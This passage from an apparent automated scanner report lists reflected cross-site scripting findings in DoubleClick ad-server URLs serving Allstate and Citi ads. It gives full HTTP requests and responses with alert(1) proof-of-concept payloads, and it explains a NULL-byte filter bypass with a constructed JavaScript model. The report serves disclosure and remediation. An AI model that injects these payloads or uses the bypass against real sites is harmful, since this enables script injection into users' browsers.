Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLvRHCMAwG0I_fM5c16DjdxZZlKUvQUtux3KVjJEZiIMjr34QDgLvzmqJbI7EUKQ9NVFsVGrrOyViGqgccn7fynXDaR8u1NS9M7KakXRbqsThZ5h6TLDzbf5wBfQRcgM8WcAXeL_wAVkOPlnMAAAA%3D%26dst%3Dhttp%253A%252F%252Fallstate.com&_wp=AAABMNP-ME81bEEMb-QRfDpqx4jvs7eBEPKBtw&_nv=1&_CDbg=17087056&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFC6BAEAAAAAwZ4KAQAAAAC9oAQBAAAAAOCjCgEAAAAAxKIKAQAAAAAGuAQBAAAAACJD7EEAAAAAAADwPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAABlM2MyMWU4Yi01ODIxLTRmNzItYWJhNS1mN2MwMjgzNWY3N2UkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAANQ2CU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7535
Date: Tue, 28 Jun 2011 02:09:27 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
0%3B41422311/41440098/1%3Bu%3D17474528%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=e3c21e8b-5821-4f72-aba5-f7c02835f77e&_o=15719&_eo=97956&_et=1309226708&_a=17087056&_s=11683&_d=17473217&_c=170805091eaf6"-alert(1)-"1c881d63b74&_pm=97956&_pn=17474528&redirect=https%3a%2f%2fquote.allstate.com%3Fquote%3DPQ%26cid%3DBAC-Xplus1%26att%3D61840000%3B39858194%26%26TFN%3D8664972899%26Campaign%3D222230000010575");
var fscUrl = url;
var
...[SNIP]...

1.46. http://ad.doubleclick.net/adi/x1.rtb/allstate/poem1 [_eo parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/allstate/poem1

Issue detail

The value of the _eo request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eb3ed"-alert(1)-"c4998f35407 was submitted in the _eo parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/allstate/poem1;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=e3c21e8b-5821-4f72-aba5-f7c02835f77e&_o=15719&_eo=eb3ed"-alert(1)-"c4998f35407&_et=1309226708&_a=17087056&_s=11683&_d=17473217&_c=17080509&_pm=97956&_pn=17474528&redirect=;u=17474528;ord=2507911? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLvRHCMAwG0I_fM5c16DjdxZZlKUvQUtux3KVjJEZiIMjr34QDgLvzmqJbI7EUKQ9NVFsVGrrOyViGqgccn7fynXDaR8u1NS9M7KakXRbqsThZ5h6TLDzbf5wBfQRcgM8WcAXeL_wAVkOPlnMAAAA%3D%26dst%3Dhttp%253A%252F%252Fallstate.com&_wp=AAABMNP-ME81bEEMb-QRfDpqx4jvs7eBEPKBtw&_nv=1&_CDbg=17087056&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFC6BAEAAAAAwZ4KAQAAAAC9oAQBAAAAAOCjCgEAAAAAxKIKAQAAAAAGuAQBAAAAACJD7EEAAAAAAADwPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAABlM2MyMWU4Yi01ODIxLTRmNzItYWJhNS1mN2MwMjgzNWY3N2UkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAANQ2CU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7500
Date: Tue, 28 Jun 2011 02:06:43 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
D17474528%3B%7Efdr%3D234368221%3B0-0%3B0%3B58255351%3B4307-300/250%3B41422311/41440098/1%3Bu%3D17474528%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=e3c21e8b-5821-4f72-aba5-f7c02835f77e&_o=15719&_eo=eb3ed"-alert(1)-"c4998f35407&_et=1309226708&_a=17087056&_s=11683&_d=17473217&_c=17080509&_pm=97956&_pn=17474528&redirect=https%3a%2f%2fquote.allstate.com%3Fquote%3DPQ%26cid%3DBAC-Xplus1%26att%3D61840000%3B41496831%26%26TFN%3D8664
...[SNIP]...

1.47. http://ad.doubleclick.net/adi/x1.rtb/allstate/poem1 [_o parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/allstate/poem1

Issue detail

The value of the _o request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ac37f"-alert(1)-"bb4e6cdabfe was submitted in the _o parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/allstate/poem1;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=e3c21e8b-5821-4f72-aba5-f7c02835f77e&_o=ac37f"-alert(1)-"bb4e6cdabfe&_eo=97956&_et=1309226708&_a=17087056&_s=11683&_d=17473217&_c=17080509&_pm=97956&_pn=17474528&redirect=;u=17474528;ord=2507911? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLvRHCMAwG0I_fM5c16DjdxZZlKUvQUtux3KVjJEZiIMjr34QDgLvzmqJbI7EUKQ9NVFsVGrrOyViGqgccn7fynXDaR8u1NS9M7KakXRbqsThZ5h6TLDzbf5wBfQRcgM8WcAXeL_wAVkOPlnMAAAA%3D%26dst%3Dhttp%253A%252F%252Fallstate.com&_wp=AAABMNP-ME81bEEMb-QRfDpqx4jvs7eBEPKBtw&_nv=1&_CDbg=17087056&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFC6BAEAAAAAwZ4KAQAAAAC9oAQBAAAAAOCjCgEAAAAAxKIKAQAAAAAGuAQBAAAAACJD7EEAAAAAAADwPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAABlM2MyMWU4Yi01ODIxLTRmNzItYWJhNS1mN2MwMjgzNWY3N2UkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAANQ2CU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7515
Date: Tue, 28 Jun 2011 02:06:15 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
81/1%3Bu%3D17474528%3B%7Efdr%3D234368221%3B0-0%3B0%3B58255351%3B4307-300/250%3B41422311/41440098/1%3Bu%3D17474528%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=e3c21e8b-5821-4f72-aba5-f7c02835f77e&_o=ac37f"-alert(1)-"bb4e6cdabfe&_eo=97956&_et=1309226708&_a=17087056&_s=11683&_d=17473217&_c=17080509&_pm=97956&_pn=17474528&redirect=https%3a%2f%2fquote.allstate.com%3Fquote%3DPQ%26cid%3DBAC-Xplus1%26att%3D61840000%3B39858194%26%26
...[SNIP]...

1.48. http://ad.doubleclick.net/adi/x1.rtb/allstate/poem1 [_pm parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/allstate/poem1

Issue detail

The value of the _pm request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0059830"-alert(1)-"d8f92070b1e was submitted in the _pm parameter. The portion 59830"-alert(1)-"d8f92070b1e was echoed unmodified in the application's response; the response body shows the preceding %00 retained as a literal three-character sequence (_pm=97956%0059830"-alert(1)-"d8f92070b1e), which suggests the value was percent-decoded by whatever inspected it but not by the code that emitted it.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked. Compare the _pm finding for the alldayslim/ron path (1.40), where the plain payload was reflected without any NULL byte: the blocking behaviour differs between creatives served from the same host.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
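The following is an added example, constructed for this page; it is not DoubleClick's code and not any WAF vendor's code, and the report does not identify which component applied the filter. It models the failure mode described above: a filter that scans the percent-decoded value with NUL-terminated-string semantics stops at the decoded %00 and never reaches the quote, while the emitting code copies the raw parameter, %00 included, into the script, as the response for this finding shows. The var url = ("...") template and the BLOCKED character list are assumptions made for the model.

```javascript
// Added example: model of a NULL-byte filter bypass (constructed, not vendor code).
// A native-code filter operating on char* strings sees the decoded %00 as the end
// of the string; the emitter then echoes the raw, still percent-encoded value.

// Payload as submitted in the _pm parameter in the report.
const NUL_PAYLOAD = '%0059830"-alert(1)-"d8f92070b1e';
// The same payload without the leading encoded NULL byte.
const PLAIN_PAYLOAD = '59830"-alert(1)-"d8f92070b1e';

// Characters the modelled filter refuses in a value bound for a script string
// (assumed list for the model).
const BLOCKED = ['"', "'", '<', '>', '\\'];

// Percent-decode the raw parameter; %00 decodes to U+0000.
function percentDecode(s) {
  try { return decodeURIComponent(s); } catch (e) { return s; }
}

// Filter with C-string semantics: the first NUL is treated as end of string,
// as strchr()/strpbrk() on a char* would, so nothing after it is inspected.
function cStringFilterBlocks(decoded) {
  for (let i = 0; i < decoded.length; i++) {
    const ch = decoded[i];
    if (ch === '\u0000') return false;
    if (BLOCKED.includes(ch)) return true;
  }
  return false;
}

// Length-aware filter: every character is inspected and NUL itself is rejected.
function lengthAwareFilterBlocks(decoded) {
  return Array.from(decoded).some((ch) => ch === '\u0000' || BLOCKED.includes(ch));
}

// Ad-server model: run the filter on the decoded value, then (mirroring the
// report's response) emit the raw parameter into a double-quoted JS string.
function render(rawPm, filterBlocks) {
  if (filterBlocks(percentDecode(rawPm))) {
    return { blocked: true, script: null };
  }
  const script = 'var url = ("http://bn.xp1.ru4.com/bclick?_pm=' + rawPm + '");';
  return { blocked: false, script };
}

// The constructed template contributes exactly two double quotes; any more
// means the reflected value closed the literal early.
function literalBrokenOut(script) {
  return (script.match(/"/g) || []).length > 2;
}

function demo() {
  return {
    plainVsCString: render('97956' + PLAIN_PAYLOAD, cStringFilterBlocks).blocked,
    nulVsCString: render('97956' + NUL_PAYLOAD, cStringFilterBlocks),
    nulVsLengthAware: render('97956' + NUL_PAYLOAD, lengthAwareFilterBlocks).blocked,
  };
}

const outcome = demo();
console.log('plain payload, C-string filter: blocked =', outcome.plainVsCString);
console.log('%00 payload,   C-string filter: blocked =', outcome.nulVsCString.blocked,
            'literal broken =', literalBrokenOut(outcome.nulVsCString.script));
console.log('%00 payload,   length-aware filter: blocked =', outcome.nulVsLengthAware);
```

Making the filter length-aware closes this particular bypass, but, as the remediation text says, it is the emitting code that must change: a value encoded for the JavaScript string context is safe regardless of what the filter in front of it did or did not see.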

Request

GET /adi/x1.rtb/allstate/poem1;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=e3c21e8b-5821-4f72-aba5-f7c02835f77e&_o=15719&_eo=97956&_et=1309226708&_a=17087056&_s=11683&_d=17473217&_c=17080509&_pm=97956%0059830"-alert(1)-"d8f92070b1e&_pn=17474528&redirect=;u=17474528;ord=2507911? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLvRHCMAwG0I_fM5c16DjdxZZlKUvQUtux3KVjJEZiIMjr34QDgLvzmqJbI7EUKQ9NVFsVGrrOyViGqgccn7fynXDaR8u1NS9M7KakXRbqsThZ5h6TLDzbf5wBfQRcgM8WcAXeL_wAVkOPlnMAAAA%3D%26dst%3Dhttp%253A%252F%252Fallstate.com&_wp=AAABMNP-ME81bEEMb-QRfDpqx4jvs7eBEPKBtw&_nv=1&_CDbg=17087056&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFC6BAEAAAAAwZ4KAQAAAAC9oAQBAAAAAOCjCgEAAAAAxKIKAQAAAAAGuAQBAAAAACJD7EEAAAAAAADwPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAABlM2MyMWU4Yi01ODIxLTRmNzItYWJhNS1mN2MwMjgzNWY3N2UkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAANQ2CU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7327
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 28 Jun 2011 02:10:01 GMT
Expires: Tue, 28 Jun 2011 02:10:01 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
%3B41422311/41440098/1%3B%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=e3c21e8b-5821-4f72-aba5-f7c02835f77e&_o=15719&_eo=97956&_et=1309226708&_a=17087056&_s=11683&_d=17473217&_c=17080509&_pm=97956%0059830"-alert(1)-"d8f92070b1e&_pn=17474528&redirect=https://quote.allstate.com?quote=PQ&cid=BAC-Xplus1&att=61840000;41496760&&TFN=8664972899&Campaign=222230000010575");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode
...[SNIP]...

1.49. http://ad.doubleclick.net/adi/x1.rtb/allstate/poem1 [_pn parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/allstate/poem1

Issue detail

The value of the _pn request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1864"-alert(1)-"ddf059404d1 was submitted in the _pn parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/allstate/poem1;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=e3c21e8b-5821-4f72-aba5-f7c02835f77e&_o=15719&_eo=97956&_et=1309226708&_a=17087056&_s=11683&_d=17473217&_c=17080509&_pm=97956&_pn=17474528b1864"-alert(1)-"ddf059404d1&redirect=;u=17474528;ord=2507911? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLvRHCMAwG0I_fM5c16DjdxZZlKUvQUtux3KVjJEZiIMjr34QDgLvzmqJbI7EUKQ9NVFsVGrrOyViGqgccn7fynXDaR8u1NS9M7KakXRbqsThZ5h6TLDzbf5wBfQRcgM8WcAXeL_wAVkOPlnMAAAA%3D%26dst%3Dhttp%253A%252F%252Fallstate.com&_wp=AAABMNP-ME81bEEMb-QRfDpqx4jvs7eBEPKBtw&_nv=1&_CDbg=17087056&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFC6BAEAAAAAwZ4KAQAAAAC9oAQBAAAAAOCjCgEAAAAAxKIKAQAAAAAGuAQBAAAAACJD7EEAAAAAAADwPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAABlM2MyMWU4Yi01ODIxLTRmNzItYWJhNS1mN2MwMjgzNWY3N2UkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAANQ2CU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7373
Date: Tue, 28 Jun 2011 02:10:24 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
%3Bu%3D17474528%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=e3c21e8b-5821-4f72-aba5-f7c02835f77e&_o=15719&_eo=97956&_et=1309226708&_a=17087056&_s=11683&_d=17473217&_c=17080509&_pm=97956&_pn=17474528b1864"-alert(1)-"ddf059404d1&redirect=https%3a%2f%2fquote.allstate.com%3Fquote%3DPQ%26cid%3DBAC-Xplus1%26att%3D61840000%3B41883805%26%26TFN%3D8664972899%26Campaign%3D222230000010575");
var fscUrl = url;
var fscUrlClickTagFound =
...[SNIP]...

1.50. http://ad.doubleclick.net/adi/x1.rtb/citi/cardacquisition/ct2 [_a parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/citi/cardacquisition/ct2

Issue detail

The value of the _a request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1beaa'-alert(1)-'9e65c854819 was submitted in the _a parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/citi/cardacquisition/ct2;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=90b0eb13-3bbb-45fc-9a8b-de4020ba44ec&_o=17169175&_eo=97956&_et=1309227350&_a=186273951beaa'-alert(1)-'9e65c854819&_s=11683&_d=21884229&_c=17169178&_pm=97956&_pn=21886677&redirect=;u=21886677;ord=0556495? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLOw7CMBAFwMdXRrkGHVrJjtex9xKUUPvFS5eOI3FQYPqZsANwtcjoTFkySdHyWsV6owzXOEd2VV8D9veLPSYc_oPaSV9-w1uVOorJSItL0zzSXCzH5gFHoN4CTsBnCzgD7ye-09xBdHMAAAA%3D%26dst%3Dhttp%253A%252F%252Fciticards.com&_wp=AAABMNQH-VZzQwKvJyT0DsDm_Fe1Qd2mxD567Q&_nv=1&_CDbg=18627395&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAEM7HAEAAAAARe1NAQAAAAAa-wUBAAAAANX2TQEAAAAAf_dNAQAAAACA900BAAAAACJD7EEAAAAAAADgPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA5MGIwZWIxMy0zYmJiLTQ1ZmMtOWE4Yi1kZTQwMjBiYTQ0ZWMkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAFY5CU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1986
Date: Tue, 28 Jun 2011 02:18:49 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><iframe src="http://view.atdmt.com/NYC/iview/332660709/direct;
...[SNIP]...
0%3B0%3B65365865%3B4307-300/250%3B42625058/42642845/1%3Bu%3D21886677%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=90b0eb13-3bbb-45fc-9a8b-de4020ba44ec&_o=17169175&_eo=97956&_et=1309227350&_a=186273951beaa'-alert(1)-'9e65c854819&_s=11683&_d=21884229&_c=17169178&_pm=97956&_pn=21886677&redirect=http://clk.atdmt.com/NYC/go/332660709/direct;wi.300;hi.250/01/3898408" target="_blank">
...[SNIP]...

1.51. http://ad.doubleclick.net/adi/x1.rtb/citi/cardacquisition/ct2 [_c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/citi/cardacquisition/ct2

Issue detail

The value of the _c request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c33f5'-alert(1)-'4dfa122d9d8 was submitted in the _c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/citi/cardacquisition/ct2;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=90b0eb13-3bbb-45fc-9a8b-de4020ba44ec&_o=17169175&_eo=97956&_et=1309227350&_a=18627395&_s=11683&_d=21884229&_c=17169178c33f5'-alert(1)-'4dfa122d9d8&_pm=97956&_pn=21886677&redirect=;u=21886677;ord=0556495? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
